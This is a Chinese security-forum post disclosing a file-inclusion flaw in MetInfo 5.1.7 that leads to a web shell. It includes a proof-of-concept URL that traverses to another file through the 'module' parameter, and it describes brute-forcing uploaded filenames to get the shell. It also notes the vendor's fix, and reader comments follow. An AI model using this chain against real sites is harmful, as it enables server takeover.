metinfo 5.1.7 getshell
1:代码分析
about/index.php结合metinfo的全局变量覆盖机制 可以包含文件
测试:http://w/coder/metinfo/about/?module=../robots.txt&fmodule=7
2:getshell
找个可以上传个地方
feedback\uploadfile_save.php前台上传文件的地方 文件路径可以爆破之 (100 -999) 随机 简单爆破官网demo 测试
3:漏洞修复
官方 7/17 已 修复 include\module.php
83行 $module='';
ps:漏洞板块木权限 管理转移下吧 thx
about/index.php
$filpy = basename(dirname(__FILE__));
$fmodule=1;
require_once '../include/module.php';
require_once $module;测试:http://w/coder/metinfo/about/?module=../robots.txt&fmodule=7
2:getshell
找个可以上传个地方
feedback\uploadfile_save.php前台上传文件的地方 文件路径可以爆破之 (100 -999) 随机 简单爆破
$rnd = rand(100, 999); $name = date('U') + $rnd;3:漏洞修复
官方 7/17 已 修复 include\module.php
83行 $module='';
ps:漏洞板块木权限 管理转移下吧 thx
关于作者
评论19次
我等小菜观望之 学之
还是官方的人了解自己啊,thx
支持一下
的确比较少见。没准用得上,多谢!
好明显的漏洞。
去年有一次出比赛题目我就是用这个xi统改的···
好厉害、、、
赞
哦哦哦
支持一下
mark 下
不错,路过学xi收藏了
好明显的包含!
文件包含还要改名字吧?
这套程序用的比较少,以前爆过5.1.3的貌似
学xi了
这套程序是???不常见。
不错 好几个论坛都可以看到这个帖子